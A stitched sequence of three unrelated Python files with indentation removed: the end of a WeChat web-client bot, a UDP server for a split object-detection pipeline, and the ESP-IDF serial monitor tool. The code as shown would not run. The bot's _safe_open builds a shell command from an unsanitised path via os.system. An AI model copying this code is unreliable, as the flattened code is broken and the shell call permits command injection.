logging.debug('[*] 微信网页版 ... 开动')
self.genQRCode()
print '[*] 请使用微信扫描二维码以登录 ... '
if not self.waitForLogin():
continue
print '[*] 请在手机上点击确认以登录 ... '
if not self.waitForLogin(0):
continue
break
self._run('[*] 正在登录 ... ', self.login)
self._run('[*] 微信初始化 ... ', self.webwxinit)
self._run('[*] 开启状态通知 ... ', self.webwxstatusnotify)
self._run('[*] 获取联系人 ... ', self.webwxgetcontact)
self._echo('[*] 应有 %s 个联系人,读取到联系人 %d 个' %
(self.MemberCount, len(self.MemberList)))
print
self._echo('[*] 共有 %d 个群 | %d 个直接联系人 | %d 个特殊账号 | %d 公众号或服务号' % (len(self.GroupList),
len(self.ContactList), len(self.SpecialUsersList), len(self.PublicUsersList)))
print
self._run('[*] 获取群 ... ', self.webwxbatchgetcontact)
logging.debug('[*] 微信网页版 ... 开动')
if self.DEBUG:
print self
logging.debug(self)
if self.interactive and raw_input('[*] 是否开启自动回复模式(y/n): ') == 'y':
self.autoReplyMode = True
print '[*] 自动回复模式 ... 开启'
logging.debug('[*] 自动回复模式 ... 开启')
else:
print '[*] 自动回复模式 ... 关闭'
logging.debug('[*] 自动回复模式 ... 关闭')
listenProcess = multiprocessing.Process(target=self.listenMsgMode)
listenProcess.start()
while True:
text = raw_input('')
if text == 'quit':
listenProcess.terminate()
print('[*] 退出微信')
logging.debug('[*] 退出微信')
exit()
elif text[:2] == '->':
[name, word] = text[2:].split(':')
if name == 'all':
self.sendMsgToAll(word)
else:
self.sendMsg(name, word)
elif text[:3] == 'm->':
[name, file] = text[3:].split(':')
self.sendMsg(name, file, True)
elif text[:3] == 'f->':
print '发送文件'
logging.debug('发送文件')
elif text[:3] == 'i->':
print '发送图片'
[name, file_name] = text[3:].split(':')
self.sendImg(name, file_name)
logging.debug('发送图片')
elif text[:3] == 'e->':
print '发送表情'
[name, file_name] = text[3:].split(':')
self.sendEmotion(name, file_name)
logging.debug('发送表情')
def _safe_open(self, path):
if self.autoOpen:
if platform.system() == "Linux":
os.system("xdg-open %s &" % path)
else:
os.system('open %s &' % path)
def _run(self, str, func, *args):
self._echo(str)
if func(*args):
print '成功'
logging.debug('%s... 成功' % (str))
else:
print('失败\n[*] 退出程序')
logging.debug('%s... 失败' % (str))
logging.debug('[*] 退出程序')
exit()
def _echo(self, str):
sys.stdout.write(str)
sys.stdout.flush()
def _printQR(self, mat):
for i in mat:
BLACK = '\033[40m \033[0m'
WHITE = '\033[47m \033[0m'
print ''.join([BLACK if j else WHITE for j in i])
def _str2qr(self, str):
qr = qrcode.QRCode()
qr.border = 1
qr.add_data(str)
mat = qr.get_matrix()
self._printQR(mat) # qr.print_tty() or qr.print_ascii()
def _transcoding(self, data):
if not data:
return data
result = None
if type(data) == unicode:
result = data
elif type(data) == str:
result = data.decode('utf-8')
return result
def _get(self, url, api=None):
request = urllib2.Request(url=url)
request.add_header('Referer', 'https://wx.qq.com/')
if api == 'webwxgetvoice':
request.add_header('Range', 'bytes=0-')
if api == 'webwxgetvideo':
request.add_header('Range', 'bytes=0-')
response = urllib2.urlopen(request)
data = response.read()
logging.debug(url)
return data
def _post(self, url, params, jsonfmt=True):
if jsonfmt:
request = urllib2.Request(url=url, data=json.dumps(params))
request.add_header(
'ContentType', 'application/json; charset=UTF-8')
else:
request = urllib2.Request(url=url, data=urllib.urlencode(params))
response = urllib2.urlopen(request)
data = response.read()
if jsonfmt:
return json.loads(data, object_hook=_decode_dict)
return data
def _xiaodoubi(self, word):
url = 'http://www.xiaodoubi.com/bot/chat.php'
try:
r = requests.post(url, data={'chat': word})
return r.content
except:
return "让我一个人静静 T_T..."
def _simsimi(self, word):
key = ''
url = 'http://sandbox.api.simsimi.com/request.p?key=%s&lc=ch&ft=0.0&text=%s' % (
key, word)
r = requests.get(url)
ans = r.json()
if ans['result'] == '100':
return ans['response']
else:
return '你在说什么,风太大听不清列'
def _searchContent(self, key, content, fmat='attr'):
if fmat == 'attr':
pm = re.search(key + '\s?=\s?"([^"<]+)"', content)
if pm:
return pm.group(1)
elif fmat == 'xml':
pm = re.search('<{0}>([^<]+)</{0}>'.format(key), content)
if not pm:
pm = re.search(
'<{0}><\!\[CDATA\[(.*?)\]\]></{0}>'.format(key), content)
if pm:
return pm.group(1)
return '未知'
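# _searchContent('cdnurl', content) extracts attribute-style values such as
#   cdnurl = "http://..."
# while _searchContent('des', content, 'xml') extracts element text such as
#   <des>some description</des> (CDATA sections are handled too).
# It falls back to the literal string '未知' ("unknown") when nothing matches.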
class UnicodeStreamFilter:
def __init__(self, target):
self.target = target
self.encoding = 'utf-8'
self.errors = 'replace'
self.encode_to = self.target.encoding
def write(self, s):
if type(s) == str:
s = s.decode('utf-8')
s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
self.target.write(s)
def flush(self):
self.target.flush()
if sys.stdout.encoding == 'cp936':
sys.stdout = UnicodeStreamFilter(sys.stdout)
if __name__ == '__main__':
logger = logging.getLogger(__name__)
import coloredlogs
coloredlogs.install(level='DEBUG')
webwx = WebWeixin()
webwx.start()
|
udp_testing.py | import threading
import time
from multiprocessing import Pool, Process, Queue
from socketserver import DatagramRequestHandler, ThreadingUDPServer
import numpy as np
import object_detector
import ujson
from object_detector import PARTITION_NAME
from preprocessor import Preprocessor
from utils.network_utils import (RequestType, generateErrorMsg,
generateResponse, generateResultMsg)
###
# Helper Functions for ensemble methods.
# Not currently used, but may be useful for other things, so retained
###
def reject_outliers(data, m=2):
return data[abs(data - np.mean(data)) < m * np.std(data)]
def count_unique(keys):
uniq_keys = np.unique(keys)
bins = uniq_keys.searchsorted(keys)
return uniq_keys, np.bincount(bins)
###
# End Helper Functions
###
controlPort = 9998
dataList = []
numRECV = 0
numSlices = -1
inputShape = (1, 9216)
mobileProcTime = 0
transmitStartTime = 0
endToEndStartTime = 0
DTYPE = "JACKSON"
ServerAddress = ('', controlPort)
def postProcess(socket, address, port, output_queue):
'''Post Processor for handling returning the data to the client from the server.'''
print("postProcessor Started")
while True:
# Get the classification result from the pipeline; this call blocks until a new result is available.
results = output_queue.get()
#Stop the server processing timer.
stopTime = time.time()
#store this stop time in the results packet.
results.stopServerProcTimer(stopTime)
#generate the result message and send it to the client.
socket.sendto(generateResultMsg(results),(address, port))
print("sent")
# Subclass the DatagramRequestHandler
class ControlMixin(object):
'''Defines the control methods for the threads within the UDP server.'''
def __init__(self, handler, poll_interval):
'''Executed when the threads are instantiated. Performs boilerplate setup.'''
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
def start(self):
'''Spawns a daemonized thread that runs the server's serve_forever() loop.'''
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
# print("server running")
def stop(self):
'''Boilerplate shutdown method'''
self.shutdown()
self._thread.join()
self._thread = None
class EasyUDPServer(ControlMixin, ThreadingUDPServer):
'''Class for handling UDP Requests to the server. When a Request is received, the handle() method of MyUDPRequestHandler is called.'''
def __init__(self, input_queue, output_queue, addr, handler, poll_interval=0.001, bind_and_activate=True):
'''Called when the class is instantiated. Sets up the processing pipeline and defines the class for handling UDP Requests.'''
self.input_queue = input_queue
self.output_queue = output_queue
class MyUDPRequestHandler(DatagramRequestHandler):
'''Class that defines how the server handles incoming requests.'''
def __init__(self, request, client_address, server):
'''Called when the handler is instantiated. Passes the processing pipeline from the server to the handler.'''
self.input_queue = server.input_queue
self.output_queue = server.output_queue
self.inputShape = server.inputShape
#calls the superclass initialize() method.
DatagramRequestHandler.__init__(self, request, client_address, server)
def handle(self):
'''Method for actually handling an incoming request. Based on the request type, we either setup the session or pass data to the preprocessor for classification.'''
# the data we want is the first element of the request, and we want to get rid of all the line endings (e.g., \r\n, \n)
data = self.request[0].strip()
# the socket object that the client sent from is the second element of the request.
socket = self.request[1]
# the message is received in the json format, so we unpack it into a set of key:value pairs, or a dictionary.
msgParts = ujson.loads(data)
#We match the request type of the message to the dictionary of possible request types.
reqType = RequestType[msgParts['MessageType']]
# then condition on the request type.
if reqType == RequestType.HELLO:
#if the request is a "Hello" message, we need to let the client know we are here, so we echo the request
print("HELLO Recv'd")
#generate a response message identifying this partition and echo it back
resp = generateResponse(reqType, PARTITION_NAME)
socket.sendto(resp, (self.client_address[0],controlPort))
elif reqType == RequestType.SETUP:
print("SETUP Recv'd")
input_queue.put(msgParts)
resp = generateResponse(reqType, PARTITION_NAME)
socket.sendto(resp, (self.client_address[0], controlPort)) #Respond to setup request
postProcessor = Process(target=postProcess, args = (socket,self.client_address[0], controlPort,output_queue))
postProcessor.start()
elif reqType == RequestType.DATA_HEADER:
numPictures = msgParts['NumPictures']
input_queue.put(msgParts)
elif reqType == RequestType.DATA:
input_queue.put(msgParts)
elif reqType == RequestType.GOODBYE:
print(">>disconnect request recv'd")
results = generateResponse(reqType, PARTITION_NAME)
socket.sendto(results, (self.client_address[0], controlPort))
else:
print("unknown request type!")
ThreadingUDPServer.__init__(self, addr, MyUDPRequestHandler, bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def setPartitionPt(self, partitionName, partitionDict):
if partitionName in partitionDict.keys():
self.inputShape = tuple(partitionDict[partitionName])
print("Partition Point set to layer " + partitionName + " with shape " + str(self.inputShape))
else:
print("oops")
print(partitionDict)
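# Overall pipeline wired up in main():
#   UDP handler -> preprocessor_input_q -> Preprocessor -> preprocessor_output_q
#   -> object_detector.worker -> classifier_output_q -> postProcess -> client
# Each processing stage runs in its own process (a Pool of size 1), so the
# UDP request handling stays decoupled from preprocessing and inference.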
def main():
#Setup the queues for the process communication between the Network Handler, Preprocessor, and Classifier
preprocessor_input_q = Queue()
preprocessor_output_q = Queue()
classifier_output_q = Queue()
object_detector.readPartitionData()
udpserver = EasyUDPServer(preprocessor_input_q, classifier_output_q, ServerAddress, 0.01)
udpserver.setPartitionPt(PARTITION_NAME, object_detector.partitions_dict)
udpserver.start()
try:
preprocessor = Preprocessor(preprocessor_input_q,preprocessor_output_q, udpserver.inputShape)
preprocessor_pool = Pool(1,preprocessor.run)
classifier_pool = Pool(1, object_detector.worker, (preprocessor_output_q, classifier_output_q))
udpserver.serve_forever()
except KeyboardInterrupt:
preprocessor_pool.terminate()
classifier_pool.terminate()
preprocessor_pool.join()
classifier_pool.join()
print("exiting")
if __name__ == '__main__':
main()
|
idf_monitor.py | #!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make (or idf.py) flash" (Ctrl-T Ctrl-F)
# - Run "make (or idf.py) app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import shlex
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be updated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
# regex matches a potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
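# Subclasses override run() for the main loop and _cancel() to unblock any
# blocking call run() might be sitting in. stop() clears self._thread first
# so the 'alive' property turns False, then calls _cancel() and joins the
# old thread object.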
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: the console.cancel() method doesn't seem to
# unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix':
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
import fcntl, termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except:
pass
class LineMatcher:
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# Lines without a recognised log prefix are printed only if the default "*" level is above N.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
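# Example (hypothetical tag names): a --print_filter of "wifi:W mdns" builds
# {'wifi': LEVEL_W, 'mdns': LEVEL_V}: "wifi" lines show at warning level and
# above, "mdns" lines always show, and every other tag falls back to the "*"
# entry, which defaults to LEVEL_N here because "*" was not listed explicitly.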
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace(b"\n", b"\r\n"),
"CR": lambda c: c.replace(b"\n", b"\r"),
"LF": lambda c: c.replace(b"\r", b"\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
# If no further data is received in the next short period
# of time then the _invoke_processing_last_line_timer
# generates an event which will result in the finishing of
# the last line. This is a fix for handling lines sent
# without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes the port has already been closed in the serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._output_enabled and (self._force_line_print or self._line_matcher.match(line)):
self.console.write_bytes(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
# Now we have the last part (incomplete line) in _last_line_part. By
# default we don't touch it and just wait for the arrival of the rest
# of the line. But if it still hasn't arrived after some time, we need
# to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part)):
self._force_line_print = True
if self._output_enabled:
self.console.write_bytes(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [ CTRL_H, 'h', 'H', '?' ]:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
elif c == CTRL_Y: # Toggle output display
self.output_toggle()
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
# quickly trigger the pause sequence without another menu key press
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {makecmd:7} Build & flash project
--- {appmake:7} Build & flash app only
--- {output:7} Toggle output display
--- {pause:7} Reset target into bootloader to pause app via RTS line
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A),
output=key_description(CTRL_Y),
pause=key_description(CTRL_P) )
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A) ))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [ CTRL_F, CTRL_A ]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [ target ]
else:
popen_args = [ self.make, target ]
yellow_print("Running %s..." % " ".join(popen_args))
p = subprocess.Popen(popen_args)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd=".")
if b"?? ??:0" not in translation:
yellow_print(translation.decode())
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(p) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd=".")
process.wait()
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def main():
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', '/dev/ttyUSB0')
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
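# For example, a MAKEFLAGS value like " --jobserver-auth=3,4 -j4" (the exact
# jobserver flag name varies with the make version) is rewritten to " -j4".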
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.exit_key),
key_description(monitor.menu_key),
key_description(monitor.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [ 0, 4, 2, 6, 1, 5, 3, 7 ]
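# For example, the sequence b'\033[1;32m' (bold green) matches RE_ANSI_COLOR
# with groups (b'1', b'2'): ANSI_TO_WINDOWS_COLOR[2] == 2 selects Windows green,
# and the leading '1' additionally ORs in FOREGROUND_INTENSITY.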
